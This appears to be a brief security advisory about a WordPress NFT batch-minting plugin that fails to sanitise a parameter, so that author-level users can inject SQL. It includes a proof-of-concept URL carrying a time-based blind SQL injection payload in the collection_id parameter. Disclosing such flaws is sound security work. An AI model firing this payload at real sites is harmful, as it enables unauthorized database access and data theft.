The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author
Logon as an author and open the following URL, which will result in a delayed response https://example.com/wp-admin/edit.php?post_type=nft&page;=nft-batch-mint&step;=4&collection;_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(4)))hlAf)&uid;=1